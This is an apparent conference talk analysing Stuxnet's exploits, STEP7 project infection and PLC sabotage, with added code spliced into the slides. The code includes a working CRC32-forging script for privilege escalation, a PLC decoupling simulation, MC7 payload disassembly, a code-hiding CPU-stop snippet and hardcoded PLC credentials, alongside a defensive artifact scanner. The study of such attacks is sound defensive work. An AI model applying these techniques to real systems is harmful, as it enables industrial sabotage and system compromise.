Targeted Industrial Control Process Attacks – Lessons from Stuxnet
Felix 'FX' Lindner
About
- Founder and technical lead of Recurity Labs GmbH
- Over 20 years in the computer industry
- Specialized in attack methodologies and techniques
- Published the first exploits against Cisco IOS and RIM BlackBerry
- Reverse engineer at heart
Agenda
- Goals of attacks on ICS
- Standard attack patterns
- Technical review of Stuxnet
- Stuxnet prerequisites
- Reusable techniques and patterns
- Current defense strategies
- Alternative defense strategies
Goals of ICS Attacks
- ICS attacks that were documented:
  - Demonstration purposes
    - Power grid
    - Chemical industry
    - Railroad management
  - Detonating a Trans-Siberian natural gas pipeline (disputed)
  - Delaying a uranium enrichment program suspected of serving a nuclear weapons effort
Goals of ICS Attacks
- Commonly suspected goals in the future:
  - Harming the competition
    - Delaying production of a competing vendor
    - Primarily aimed at just-in-time suppliers
  - Blackmailing ICS owners
    - Similar to documented cases of network blackmail, e.g. City of San Francisco vs. Terry Childs
  - Industrial espionage
    - Extraction of ICS programming in order to reverse engineer recipes and algorithms
Challenges of ICS Security
Topic                       Office IT             Control Systems
Availability                Planned downtimes     24 x 7 x 365 x forever
Anti-virus                  Widely used           Uncommon / impossible
Lifetime                    3-5 years             Up to 20 years
Outsourcing                 Common                Becoming common
Software patching           Regular, scheduled    Slow, vendor specific
Change management           Common                Rare
Real-time performance       Best effort           Critical (safety, process)
Security awareness          Good                  Poor (physical security only)
Security testing + audits   Regular, scheduled    None
Physical security           Difficult             Good if local, hard if remote
Time / log correlation      Common                Often ignored
STANDARD ATTACK PATTERNS
Internal Attack Patterns
- Direct manipulation by subverted, bribed or disgruntled employees
  - Removal of control system source code from the site
  - Configuring access restrictions with passwords that are not communicated to the owner
- Compromise of upstream management systems
  - Preferred method for people without ICS knowledge
  - SAP plant management and similar homegrown tools with no or very little access control
External Attack Patterns
- Pre-compromise of production components
  - Logic bombs or intentional vulnerabilities in components acquired by the victim
  - Recommending or providing software with "side effects" to suppliers
    - Especially well suited for expensive software components
    - A method occasionally used within the network community
External Attack Patterns (cont.)
1. Compromise a workstation in the target's office network
2. Compromise a server in the target's office network that has a connection to the control systems
3. Establish a man-in-the-middle point of control between the operator and the ICS network
4. Modify the control system
The State of the Art in 2005
Evolution of Standard Patterns
- Most ICS environments used to be equipment-vendor specific
  - In some industries, the production process is completely dependent on the vendors
  - Solutions are homogeneous inside a particular process but heterogeneous between processes
- The landscape is changing rapidly
  - Component-based procurement standardizes the production equipment
  - Semi-standardized protocols are used to improve interoperability
  - Wireless protocols are introduced to improve flexibility
A TECHNICAL REVIEW OF STUXNET
Features of Stuxnet
- Multiple spreading mechanisms:
  - CVE-2010-2568 Windows LNK vulnerability, local code execution
  - CVE-2010-3888 Windows Task Scheduler, local privilege escalation
  - CVE-2010-2743 Windows keyboard layout, local privilege escalation
  - CVE-2010-2729 Windows Print Spooler service, remote code execution
  - CVE-2008-4250 Windows Server service RPC handling, remote code execution
  - Self-copying to remote network shares
  - Self-copying to remote Siemens WinCC servers
  - Infection of Siemens STEP7 project files for automatic launch upon load
Features of Stuxnet (2)
- Peer-to-peer updating mechanism in LANs
- Contacts two predefined C&C (command and control) servers
- Windows rootkit driver covering all Windows versions since 2000
  - Driver file is signed with a valid code signing certificate
- Circumvention and corruption of 10 different client security products
  - Special treatment for 3 additional ones
- DLL loading routine that fools behavior-based HIDS detection mechanisms
Features of Stuxnet (3)
- Fingerprinting of an industrial control process through documented and undocumented data structures in programmable logic controllers (PLCs)
- Backdoors all instances of Siemens WinCC and STEP7 by patching their communication DLL in order to hide its presence on the PLC
- Virtualizes the PLC on the PLC itself, in order to modify input and output signals without the legitimate code on the PLC noticing
CVE-2010-2568: LNK
- Uses a special feature of .LNK files
- Explorer needs the icon of the target of the LNK file in order to render it (just displaying the folder is enough, no click required)
- LNK uses "dynamic icons" when pointing to a control panel entry
- Dynamic icons use an alternative handling in which Explorer.exe calls the LoadLibrary API on the destination
- LoadLibrary causes the DLL's DllMain function to be executed during load
=> 100% reliable code execution within the context of the user's Explorer.exe
CVE-2010-3888: Task Scheduler
- Uses a CRC32 compensation attack to exploit a design flaw in the Task Scheduler
- When creating a scheduled task, the scheduler creates an XML file for it
  - The XML file contains the user the task is executed under
  - The XML file is writable by the user who created the task
- The scheduler computes a CRC32 over the file and stores the checksum in the registry
  - When the execution time arrives, the CRC32 is validated against the file
- Stuxnet modifies the user context of the scheduled task and performs a CRC32 compensation so that the stored checksum still matches
=> 100% reliable code execution as LocalSystem on Windows Vista and above
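A worked example of the CRC32 compensation the slide refers to. This is added code written for this page, not Stuxnet's code and not part of the talk: given a file whose only integrity protection is a stored CRC32, it changes the content and appends four computed bytes inside a trailing XML comment so that the checksum is unchanged while the document still parses. The task XML, the user name "alice" and the command name are constructed samples, not a real Task Scheduler file; the SID S-1-5-18 is LocalSystem.

```python
"""CRC32 compensation: modify a file yet keep its stored CRC32 unchanged.

Added example for this page (not Stuxnet code). The sample task XML below
is constructed and is not a real Task Scheduler file.
"""
import zlib
import xml.dom.minidom

MASK = 0xFFFFFFFF

# Reflected CRC32 table, identical to the one zlib uses.
TABLE = []
for i in range(256):
    c = i
    for _ in range(8):
        c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
    TABLE.append(c)
# The high byte of the table entries is a permutation of 0..255, which is
# what makes every table step reversible.
REV = {t >> 24: i for i, t in enumerate(TABLE)}


def crc32_of(data: bytes) -> int:
    return zlib.crc32(data) & MASK


def register_after(data: bytes) -> int:
    """CRC32 shift register after `data`, before the final XOR."""
    return crc32_of(data) ^ MASK


def unstep(reg: int, byte: int) -> int:
    """Invert one table step: the register value before `byte` was consumed."""
    idx = REV[reg >> 24]
    return (((reg ^ TABLE[idx]) << 8) & MASK) | ((idx ^ byte) & 0xFF)


def forge_patch(prefix: bytes, suffix: bytes, target_crc: int) -> bytes:
    """Return 4 bytes P such that crc32(prefix + P + suffix) == target_crc."""
    # Register required right after P, obtained by undoing the suffix bytes.
    want = target_crc ^ MASK
    for b in reversed(suffix):
        want = unstep(want, b)
    # Walk the four steps backwards to recover the table indices they used.
    idx = [0] * 4
    rev = want
    for i in range(3, -1, -1):
        idx[i] = REV[rev >> 24]
        rev = ((rev ^ TABLE[idx[i]]) << 8) & MASK
    # Walk forwards from the real register to turn the indices into bytes.
    reg = register_after(prefix)
    patch = bytearray()
    for i in range(4):
        patch.append((idx[i] ^ reg) & 0xFF)
        reg = TABLE[idx[i]] ^ (reg >> 8)
    return bytes(patch)


def patch_xml_keeping_crc(original: bytes, modified: bytes) -> bytes:
    """Append a comment to `modified` so that its CRC32 equals crc32(original).

    The four forged bytes are arbitrary, so the comment padding is varied
    until they are printable and contain no '-', keeping the XML well-formed.
    """
    target = crc32_of(original)
    suffix = b" -->"
    for n in range(1_000_000):
        prefix = modified + b"<!-- " + str(n).encode() + b" "
        p = forge_patch(prefix, suffix, target)
        if all(0x20 <= c < 0x7F and c != 0x2D for c in p):
            return prefix + p + suffix
    raise RuntimeError("no comment-safe patch found")


# Constructed sample: a task that runs as user "alice", changed to run as
# LocalSystem (S-1-5-18), which is the manipulation the slide describes.
ORIGINAL_TASK = (
    b'<?xml version="1.0"?>\n'
    b"<Task><Principals><Principal><UserId>alice</UserId></Principal>"
    b"</Principals><Actions><Exec><Command>backup.exe</Command></Exec>"
    b"</Actions></Task>\n"
)
MODIFIED_TASK = ORIGINAL_TASK.replace(b"alice", b"S-1-5-18")


def demo() -> dict:
    forged = patch_xml_keeping_crc(ORIGINAL_TASK, MODIFIED_TASK)
    xml.dom.minidom.parseString(forged)  # raises if the XML was broken
    return {
        "crc_unchanged": crc32_of(forged) == crc32_of(ORIGINAL_TASK),
        "user_changed": b"<UserId>S-1-5-18</UserId>" in forged,
        "forged": forged,
    }


if __name__ == "__main__":
    r = demo()
    print(r["forged"].decode())
    print("CRC32 unchanged:", r["crc_unchanged"])
```

The point for defenders: a CRC is a linear error-detecting code, so any fixed 32-bit value can be reached by appending four chosen bytes, and a check that compares a user-writable file against a stored CRC32 provides no integrity at all. Only a keyed MAC or a signature over the file, or a file the user cannot write, closes this.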
CVE-2010-2743: Keyboard Layout
- Windows XP and lower allow keyboard layouts to be loaded from anywhere
- An index read from the layout file is used, without validation, in kernel mode as an index into a function pointer table with 3 entries
- The exploit scans the memory past the function pointer table for DWORDs that are usable as user-mode addresses
  - When one is found (< 0x80000000), it allocates memory there and triggers the vulnerability
=> 100% reliable code execution in the kernel on Windows XP and below
CVE-2010-2729: Print Spooler
- Enumerates printer shares on the network and connects as the Guest account
- A print job requests to print an EXE and a MOF file, asking to print to file in %SYSTEM32%
- When printing for Guest, the spooler does not impersonate the remote user but runs as System, so writing to %SYSTEM32% is allowed
- MOF (Managed Object Format) files are compiled WMI definitions; a MOF file dropped into the WMI directory below %SYSTEM32% is picked up automatically
  - Windows monitors that directory, compiles the MOF file and executes its instructions, which run the EXE file
=> 100% reliable remote code execution as System
CVE-2008-4250: Server Service
- Known vulnerability, found being exploited in the wild by W32/Gimmiv.A
  - Interesting to note: Gimmiv.A reports the installed security products back to its C&C server
- Exploits a vulnerability in the path canonicalization code of the Server service, reachable via RPC
  - Patched since 2008 (MS08-067)
  - Actually turns out to be a sister vulnerability of MS06-040
- Gains code execution as System
- Widely used exploit in the Metasploit Framework, including a large number of target Windows versions and DEP circumvention on Windows XP and 2003
=> Remote code execution as System, with a fair (not 100%) chance of success
Special DLL Loading
- Host IDS behavior monitoring usually looks at LoadLibrary API calls
- Stuxnet hooks the file handling routines in NTDLL.DLL in order to redirect them into memory areas when special filenames are encountered
- When Stuxnet uses LoadLibrary, the special filenames do not exist on the file system, so the HIDS ignores the call
Corrupting the Watchers
Security Software     Infected Process
KAV v1 to v7          LSASS.EXE
KAV v8 to v9          KAV Process
McAfee                Winlogon.exe
AntiVir               LSASS.EXE
BitDefender           LSASS.EXE
ETrust v5 to v6       (fail)
ETrust (Other)        LSASS.EXE
F-Secure              LSASS.EXE
Symantec              LSASS.EXE
ESET NOD32            LSASS.EXE
Trend PC Cillin       Trend Process
Siemens STEP7 Project Infection
- Stuxnet patches the STEP7 project file handling routines to modify any project opened in the development or management IDE
  - Ignores projects older than 3.5 years
  - Ignores projects that appear to be examples
- A specific DLL is placed in the directory "hOmSave7" of the STEP7 project
- STEP7-specific data in "Apilogtypes" is modified so that the DLL from "hOmSave7" is loaded when the project file is opened
  - The DLL is searched for in %SYSTEM32% and the STEP7 directories first; when it is not found there, it is loaded from the project's directory (a classic DLL search order fallback)
Siemens STEP7 Project Infection (2)
- Similar to STEP7 project infections, Stuxnet also infects MCP files, used by Siemens WinCC
  - WinCC databases are accessed through a hardcoded username/password combination for an administrative user that cannot be changed
  - Stuxnet uses remote SQL commands to transfer itself to the server and execute there
- Project files (even local ones) are infected with Stuxnet itself and a cabinet file in "GracScc_tlg7.sav"
  - Such projects, if loaded into a WinCC server manually, may execute Stuxnet as well
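A hunting script for the file-level indicators named on the two STEP7/WinCC infection slides above. It is added code written for this page, not part of the talk and not a Siemens tool: it walks project directories for a DLL inside an "hOmSave7" directory (and reports whether the search order described above would really load it from the project), for a "GracScc_tlg7.sav" cabinet file, and for any s7otbxdx.dll whose hash differs from a known-good value. The directory layout, file contents and the placeholder DLL name "loader.dll" are constructed for the example; the slides do not name the real DLL, and the known-good hash is assumed to come from a clean installation.

```python
"""Hunt for the STEP7 / WinCC project-infection artifacts named on the slides.

Added example for this page; not part of the talk and not a Siemens tool.
The directory layout and file contents in build_sample_tree() are
constructed; "loader.dll" is a placeholder name.
"""
import hashlib
import os
import shutil
import tempfile
from typing import Dict, List, Tuple

Finding = Tuple[str, str]  # (indicator, path)


def scan_projects(root: str, search_dirs: List[str]) -> List[Finding]:
    """Walk project trees below `root` and report the slides' file-level indicators.

    `search_dirs` are the directories STEP7 consults before the project
    directory (system32 and the STEP7 installation, per the slide)."""
    findings: List[Finding] = []
    for dirpath, _, filenames in os.walk(root):
        in_homsave7 = os.path.basename(dirpath).lower() == "homsave7"
        for name in filenames:
            path = os.path.join(dirpath, name)
            lower = name.lower()
            if in_homsave7 and lower.endswith(".dll"):
                # A same-named DLL in system32/STEP7 wins the search; otherwise the
                # project-local copy is what gets loaded when the project is opened.
                shadowed = any(os.path.exists(os.path.join(d, name)) for d in search_dirs)
                findings.append(("homsave7-dll" if shadowed else "homsave7-dll-loaded", path))
            elif lower == "gracscc_tlg7.sav":
                findings.append(("wincc-gracscc-cab", path))
    return findings


def check_s7otbxdx(root: str, known_good_sha256: str) -> List[Finding]:
    """Flag every s7otbxdx.dll below `root` whose SHA-256 is not the known-good one.

    `known_good_sha256` is assumed to come from a clean STEP7 installation."""
    findings: List[Finding] = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.lower() == "s7otbxdx.dll":
                path = os.path.join(dirpath, name)
                with open(path, "rb") as f:
                    digest = hashlib.sha256(f.read()).hexdigest()
                if digest != known_good_sha256:
                    findings.append(("s7otbxdx-modified", path))
    return findings


CLEAN_S7OTBXDX = b"MZ clean vendor communication DLL (constructed bytes)"


def build_sample_tree(root: str) -> None:
    """Constructed layout: a STEP7 install dir, one clean and one infected project."""
    def put(rel: str, data: bytes = b"x") -> None:
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(data)

    put("S7BIN/s7otbxdx.dll", CLEAN_S7OTBXDX)            # vendor copy
    put("Projects/Clean/Clean.s7p")
    put("Projects/Infected/Infected.s7p")
    put("Projects/Infected/hOmSave7/loader.dll", b"MZ")   # placeholder name
    put("Projects/Infected/GracScc_tlg7.sav", b"MSCF")    # cabinet magic
    put("Projects/Infected/s7otbxdx.dll", b"MZ wrapper")  # wrapper copy, hash differs


def demo() -> Dict[str, str]:
    """Run the hunt over the constructed tree; returns indicator -> relative path."""
    root = tempfile.mkdtemp(prefix="s7hunt-")
    try:
        build_sample_tree(root)
        findings = scan_projects(os.path.join(root, "Projects"), [os.path.join(root, "S7BIN")])
        findings += check_s7otbxdx(root, hashlib.sha256(CLEAN_S7OTBXDX).hexdigest())
        return {k: os.path.relpath(p, root).replace(os.sep, "/") for k, p in findings}
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for indicator, path in sorted(demo().items()):
        print(f"{indicator:24} {path}")
```

On a real engineering workstation, point scan_projects() at the project share and pass the actual %SYSTEM32% and STEP7 directories as search_dirs; a project-local DLL that is not shadowed by a vendor copy is exactly the case the slide describes, since it is what STEP7 ends up loading.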
Siemens PLC Infection
- On Windows PCs with Siemens PLC software, the DLL "s7otbxdx.dll" is replaced by a wrapper
  - The original version is kept for functionality
- The wrapper ensures that:
  - When writing to the PLC, the Stuxnet PLC payload is added in transit
  - When reading from the PLC, the Stuxnet PLC payload is removed and hence hidden from view
  - An additional thread runs, monitoring the PLC and verifying target properties
  - A second additional thread controls a data block on the PLC, remotely managing its behavior
Siemens PLC Infection (2)
- Before infecting any PLC, the injected code on the Windows PC verifies properties
  - PLC CPU type 6ES7-417 or 6ES7-315-2
  - A CP 342-5 Profibus interface module is present
  - At least 33 devices with Profibus identification number 0x7050 or 0x9500 are present
    - Identification numbers are assigned to vendors by PROFIBUS & PROFINET International and are globally unique, comparable to IANA assignments
    - The devices are variable frequency drives (VFDs) from Fararo Paya (Iran) and Vacon (Finland)
Stuxnet MC7 Payload
- Three payloads are delivered with Stuxnet
  - Two almost identical payloads for 315-2 CPUs
    - Called Block A and B by Symantec
  - One larger payload for 417 CPUs
    - Called Block C by Symantec
- Replacement of DP_RECV
  - DP_RECV is responsible for processing received Profibus messages on the PLC
  - The original function code is moved and a malicious replacement is embedded
- Organization Block OB1 (cyclic execution) is patched with a call to the Stuxnet MC7 payload
- OB35 (timed execution) is patched with a call to the Stuxnet MC7 payload (watchdog function)
Binary Comparison of Block A and B
Stuxnet MC7 Payload (2)
- Block A/B implement a state machine
  1. Record frames via DP_RECV and monitor values of the VFDs, until enough events are recorded
  2. Wait 2 hours
  3. Send bursts of Profibus frames to the VFDs (Phase I)
     - 145 or 127 frames (Vacon VFDs)
     - 34 or 32 frames (Fararo Paya VFDs)
  4. Send bursts (Phase II)
     - 2 or 36 frames (Vacon VFDs)
     - 23 or 27 frames (Fararo Paya VFDs)
  5. Reset internal values and reinitialize internal structures
- State 0 is the global error handler.
Stuxnet MC7 Payload Code
ADD_AC:                          // CODE XREF: S7_LV+94p
            OPN DB888
            L DBW10h             //   word 888.16
            L W#16#3             //   word 3
            <I                   //   ACCU2 is less than ACCU1
                                 //   3 > 888.16
            JC loc_2840          //   jump if RLO=1 (DW888.16 < 3)
                                 //   (do not jump if DW888.16 is 3 or more)
            TAK                  //   exchange ACCU1 and ACCU2
            L W#16#4             //   ACCU1 = 4
            >I                   //   ACCU2 is greater than ACCU1
                                 //   4 < 888.16
            JC loc_2840          //   jump if RLO=1 (DW888.16 > 4 )
                                 //   (do not jump if DW888.16 is 4 or less)
            L DW#16#0DEADF007h
            PUSH                 // copy ACCU1 into ACCU2
            BE

loc_2840:                        // CODE XREF: ADD_AC+Ej
                                 // ADD_AC+1Aj
            L DW#16#0
            PUSH                 // copy ACCU1 into ACCU2
            BE
Timing of the MC7 Payload
- Recording takes place for 13 days
- Wait 2 hours (fixed)
- Pause after the first burst is 27 days
- Pause after the second burst is 27 days
=> 67 days for one cycle of the attack
  - Wearing out was the goal, not destruction
  - The product of the attacked process was the target, not the production equipment
PLC Virtualization / Decoupling
- PLCs, including the Siemens S7, execute in cycles
  - Read all input signals into the process image input table
  - Execute OB1
  - Write all output bits from the process image output table and generate the signals
- Stuxnet disables the automatic update of the process image input and output tables
  - Essentially decoupling the entire PLC from its sensor array, virtualizing it
  - Allows the Stuxnet payload to modify input and output bits (corresponding to signals) so that the original code does not notice any changes
=> No explicit operator spoofing required! This method may even fool people manually debugging the PLC.
PLC Input / Output Decoupling
        L        LW0
        BLD      +7
        =        L 14h.0
        L        B#16#0
        T        LB15h
        UC       SFC1Ah       // SFC 26 (UPDAT_PI): update process image input table
        JU       loc_24
        (arg)    P# L 15h.0
        (arg)    P# L 0.0
        (arg)    P# L 0.0

  loc_24:
         BLD     +8
         BLD     +7
         =       L 14h.0
         L       B#16#0
         T       LB15h
         UC      SFC1Bh       // SFC 27 (UPDAT_PO): update process image output table
         JU      loc_46
         (arg)   P# L 15h.0
         (arg)   P# L 0.0
         (arg)   P# L 0.0

  loc_46:
         BLD     +8
         T       LW0
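A small model of the decoupling described on the two slides above, added for this page as an illustration. It is a pure Python simulation written here, not Siemens code and not Stuxnet's MC7: a cyclic PLC refreshes its process images from the sensors, runs OB1 and writes the outputs; the payload then switches the automatic refresh off, does the refreshes itself (the SFC 26 / SFC 27 calls in the listing), records the real inputs for a few cycles, replays that picture to OB1 and pushes its own outputs to the actuators. All signal names and values (speed setpoint, fault bit, the forced command 1410) are constructed and carry no physical meaning.

```python
"""Model of an S7-style scan cycle and of the process-image decoupling the
slides describe. Added illustration written for this page: a pure Python
simulation with constructed signal values, not Siemens code and not MC7.
"""
from typing import Callable, Dict, List, Optional

Image = Dict[str, int]


class Plc:
    """Minimal cyclic PLC: sensors -> PII -> OB1 -> PIQ -> actuators."""

    def __init__(self, sensors: Image, ob1: Callable[[Image], Image]):
        self.sensors = sensors        # physical input signals (constructed)
        self.actuators: Image = {}    # physical output signals
        self.pii: Image = {}          # process image input table
        self.piq: Image = {}          # process image output table
        self.ob1 = ob1                # legitimate cyclic program
        self.auto_update = True       # cyclic image refresh done by the CPU firmware
        self.prepended: Optional[Callable[["Plc"], None]] = None  # code patched in front of OB1

    def updat_pi(self) -> None:       # what SFC 26 UPDAT_PI does
        self.pii = dict(self.sensors)

    def updat_po(self) -> None:       # what SFC 27 UPDAT_PO does
        self.actuators = dict(self.piq)

    def cycle(self) -> None:
        if self.auto_update:
            self.updat_pi()
        if self.prepended is not None:  # OB1 was patched with a call in front of the original code
            self.prepended(self)
        self.piq = self.ob1(self.pii)
        if self.auto_update:
            self.updat_po()


def legit_ob1(pii: Image) -> Image:
    """Toy control law: run the drive at the requested speed unless a fault is reported."""
    return {"drive_cmd": 0 if pii["fault"] else pii["speed_setpoint"]}


class DecouplingPayload:
    """Stuxnet-style decoupling: the firmware no longer refreshes the process
    images; the payload refreshes them itself, replays recorded inputs to OB1
    and pushes its own outputs, so OB1 never sees anything unusual."""

    def __init__(self, record_cycles: int, forced_output: int):
        self.record_cycles = record_cycles
        self.forced_output = forced_output   # constructed value
        self.recorded: List[Image] = []
        self.replay_at = 0

    def install(self, plc: Plc) -> None:
        plc.auto_update = False
        plc.prepended = self

    def __call__(self, plc: Plc) -> None:
        attacking = len(self.recorded) >= self.record_cycles
        # Outputs: overwrite what OB1 computed last cycle, then write it out (SFC 27).
        if attacking:
            plc.piq = {"drive_cmd": self.forced_output}
        plc.updat_po()
        # Inputs: read the real sensors (SFC 26), then either record them or
        # hand OB1 a replay of the recorded, healthy-looking picture.
        plc.updat_pi()
        if not attacking:
            self.recorded.append(dict(plc.pii))
        else:
            plc.pii = dict(self.recorded[self.replay_at % len(self.recorded)])
            self.replay_at += 1


def run(record_cycles: int = 3) -> Dict[str, int]:
    sensors: Image = {"speed_setpoint": 1000, "fault": 0}
    plc = Plc(sensors, legit_ob1)
    plc.cycle()
    normal_output = plc.actuators["drive_cmd"]
    payload = DecouplingPayload(record_cycles, forced_output=1410)
    payload.install(plc)
    for _ in range(record_cycles):
        plc.cycle()                        # recording phase: behaviour unchanged
    sensors["fault"] = 1                   # the real process now reports a fault
    plc.cycle()
    plc.cycle()                            # attack phase
    return {
        "normal_output": normal_output,               # 1000
        "real_fault": plc.sensors["fault"],           # 1
        "ob1_sees_fault": plc.pii["fault"],           # 0: OB1 still sees the recorded picture
        "ob1_command": plc.piq["drive_cmd"],          # 1000: what the legitimate code wants
        "actuator_gets": plc.actuators["drive_cmd"],  # 1410: what the drive actually receives
    }


if __name__ == "__main__":
    for k, v in run().items():
        print(f"{k:16} {v}")
```

The model shows why no separate operator spoofing is needed: OB1, and anything that reads the process image through the PLC (an HMI, or an engineer stepping through the block online), sees a consistent recorded picture, while the actuators receive values the legitimate program never computed. Only a measurement taken outside the PLC, at the drive or on the Profibus itself, disagrees with what the controller reports.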
BLD: A Trick Not Used
- STEP7 engineers frequently use a simple trick to hide code
- The BLD instruction is used as a marker around blocks of code
  - The instruction has no effect on the PLC, but is interpreted by the Siemens editors. Known combinations are:
    - BLD 1 / 2 (FC with parameters)
    - BLD 3 / 4 (FB with parameters)
    - BLD 7 / 8
    - BLD 14 / 15 (FC without parameters)
    - BLD 103 / 104
    - BLD 130 / 131 / 132 / 133 / 255
- The Stuxnet code does not make use of this trick
  - It actually keeps the original BLD instructions, wasting space and simplifying analysis using Siemens tools
BLD Hiding

BLD +7

A "Always ON"   // When being nasty, use this snippet
JC Run
UC SFC 46       // SFC 46 (STP): stops the CPU
Run: NOP 0

... your code
... CC or UC of your FC's
BLD +8

=> Everything between BLD +7 and BLD +8 is hidden by the editor; the call to SFC 46 halts the CPU unless the "Always ON" bit makes the conditional jump over it.
REUSABLE TECHNIQUES AND PATTERNS
How Much Was Required?
Attack Capability                  Required for Targeted Attack?
CVE-2010-2568 LNK                  No
CVE-2010-3888 Task Scheduler       No
CVE-2010-2743 Keyboard Layout      No
CVE-2010-2729 Print Spooler        No
CVE-2008-4250 Server Service RPC   No
Self-copying to network share      No
Peer-to-peer updating              No
C&C Servers                        No
Windows rootkit & certificates     No
10 AV product circumventions       No
Behavioral detection evasion       No
How Much Was Required?
Attack Capability              Required for Targeted Attack?
Self-copying to WinCC          Optional
STEP7 project file infection   Yes
ICS process fingerprinting     Yes
STEP7 DLL Backdoor             Optional
PLC Virtualization             Yes
Relevant Techniques
- Most of Stuxnet's functionality is oriented towards spreading, survival and persistence
  - The measures taken are extreme
- Targeted attacks on an industrial process only need a few key technologies
- If the infection can be accomplished by human means, only the PLC payload stays relevant
  - Stuxnet demonstrates how it is done
  - There is still significant room for advancement, considering the complexity of the Siemens S7
  - Similar attacks are very likely to be possible with any other PLC vendor's equipment
Only In Siemens-Land
- Dillon Beresford showed another way at Black Hat USA 2011:
  - Username: basisk
  - Password: basisk
- A compromised OS below the MC7 layer is obviously a game-over scenario for any security within the PLC network.
CURRENT AND FUTURE DEFENSES
Current Defenses
- Siemens still postulates that it is the customer's job to secure its automation process
  - Code execution upon STEP7 project loading is not considered a vulnerability. No fix.
  - Code execution through fixed passwords on WinCC servers is not fixed. The password has been publicly known since 2008.
  - At least the fixed username and password in the PLC OS have supposedly been removed since 2009
- Air gaps? Don't help, don't exist.
  - Infected consultants and service engineers
  - Process performance dashboards for management
  - Agile production environments in supplier fabs
- Virus scanners?
  - Have not protected anything since 1970.
Future Defenses
- Frequent reprogramming of the entire automation environment
  - Proposed by process engineers
  - May actually be the best option today
- Langner Controller Integrity Checker (CIC)
  - Developed in response to Stuxnet
  - Promising first attempt at solving some of the problems
    - Evasion is obviously possible, as it suffers from the detection paradigm (AV software) problem
  - Siemens specific, doesn't help with other automation environments
- Neither helps when the underlying OS is infected
Future Defenses
- Future defenses can only be developed with a better understanding of the offense
  - Stuxnet targets a very specific environment
  - Currently flourishing research is completely utility centric (power, water, waste, railway)
- Industrial control systems are extremely environment specific by nature
- The best protection is to evaluate your own environment's vulnerability
  - Based on a solid threat model, developed around your business and your likely adversaries
  - The only approach that has been shown to work in other emerging threat areas before
Thank You!
Felix 'FX' Lindner, Head
fx@recurity-labs.com
Recurity Labs GmbH, Berlin, Germany
http://www.recurity-labs.com
Presented at hashdays 2011 (listed as: Felix 'FX' Lindner - Targeted Industrial Control System Attacks - Lessons from Stuxnet).

Halvar Flake: Why Johnny can’t tell if he is compromisedArea41
 
hashdays 2011: Tobias Ospelt - Reversing Android Apps - Hacking and cracking ...
hashdays 2011: Tobias Ospelt - Reversing Android Apps - Hacking and cracking ...hashdays 2011: Tobias Ospelt - Reversing Android Apps - Hacking and cracking ...
hashdays 2011: Tobias Ospelt - Reversing Android Apps - Hacking and cracking ...Area41
 
hashdays 2011: Mikko Hypponen - Keynote
hashdays 2011: Mikko Hypponen - Keynotehashdays 2011: Mikko Hypponen - Keynote
hashdays 2011: Mikko Hypponen - KeynoteArea41
 
hashdays 2011: Sniping Slowloris - Taking out DDoS attackers with minimal har...
hashdays 2011: Sniping Slowloris - Taking out DDoS attackers with minimal har...hashdays 2011: Sniping Slowloris - Taking out DDoS attackers with minimal har...
hashdays 2011: Sniping Slowloris - Taking out DDoS attackers with minimal har...Area41
 
hashdays 2011: Christian Bockermann - Protecting Databases with Trees
hashdays 2011: Christian Bockermann - Protecting Databases with Treeshashdays 2011: Christian Bockermann - Protecting Databases with Trees
hashdays 2011: Christian Bockermann - Protecting Databases with TreesArea41
 
hashdays 2011: Ange Albertini - Such a weird processor - messing with x86 opc...
hashdays 2011: Ange Albertini - Such a weird processor - messing with x86 opc...hashdays 2011: Ange Albertini - Such a weird processor - messing with x86 opc...
hashdays 2011: Ange Albertini - Such a weird processor - messing with x86 opc...Area41
 
hashdays 2011: Jean-Philippe Aumasson - Cryptanalysis vs. Reality
hashdays 2011: Jean-Philippe Aumasson - Cryptanalysis vs. Realityhashdays 2011: Jean-Philippe Aumasson - Cryptanalysis vs. Reality
hashdays 2011: Jean-Philippe Aumasson - Cryptanalysis vs. RealityArea41
 

Mehr von Area41 (11)

Ange Albertini and Gynvael Coldwind: Schizophrenic Files – A file that thinks...
Ange Albertini and Gynvael Coldwind: Schizophrenic Files – A file that thinks...Ange Albertini and Gynvael Coldwind: Schizophrenic Files – A file that thinks...
Ange Albertini and Gynvael Coldwind: Schizophrenic Files – A file that thinks...
 
Juriaan Bremer und Marion Marschalek: Curing A 15 Year Old Disease
Juriaan Bremer und Marion Marschalek: Curing A 15 Year Old DiseaseJuriaan Bremer und Marion Marschalek: Curing A 15 Year Old Disease
Juriaan Bremer und Marion Marschalek: Curing A 15 Year Old Disease
 
Marc Ruef: Adventures in a Decade of Tracking and Consolidating Security Vuln...
Marc Ruef: Adventures in a Decade of Tracking and Consolidating Security Vuln...Marc Ruef: Adventures in a Decade of Tracking and Consolidating Security Vuln...
Marc Ruef: Adventures in a Decade of Tracking and Consolidating Security Vuln...
 
Rob "Mubix" Fuller: Attacker Ghost Stories
Rob "Mubix" Fuller: Attacker Ghost StoriesRob "Mubix" Fuller: Attacker Ghost Stories
Rob "Mubix" Fuller: Attacker Ghost Stories
 
Halvar Flake: Why Johnny can’t tell if he is compromised
Halvar Flake: Why Johnny can’t tell if he is compromisedHalvar Flake: Why Johnny can’t tell if he is compromised
Halvar Flake: Why Johnny can’t tell if he is compromised
 
hashdays 2011: Tobias Ospelt - Reversing Android Apps - Hacking and cracking ...
hashdays 2011: Tobias Ospelt - Reversing Android Apps - Hacking and cracking ...hashdays 2011: Tobias Ospelt - Reversing Android Apps - Hacking and cracking ...
hashdays 2011: Tobias Ospelt - Reversing Android Apps - Hacking and cracking ...
 
hashdays 2011: Mikko Hypponen - Keynote
hashdays 2011: Mikko Hypponen - Keynotehashdays 2011: Mikko Hypponen - Keynote
hashdays 2011: Mikko Hypponen - Keynote
 
hashdays 2011: Sniping Slowloris - Taking out DDoS attackers with minimal har...
hashdays 2011: Sniping Slowloris - Taking out DDoS attackers with minimal har...hashdays 2011: Sniping Slowloris - Taking out DDoS attackers with minimal har...
hashdays 2011: Sniping Slowloris - Taking out DDoS attackers with minimal har...
 
hashdays 2011: Christian Bockermann - Protecting Databases with Trees
hashdays 2011: Christian Bockermann - Protecting Databases with Treeshashdays 2011: Christian Bockermann - Protecting Databases with Trees
hashdays 2011: Christian Bockermann - Protecting Databases with Trees
 
hashdays 2011: Ange Albertini - Such a weird processor - messing with x86 opc...
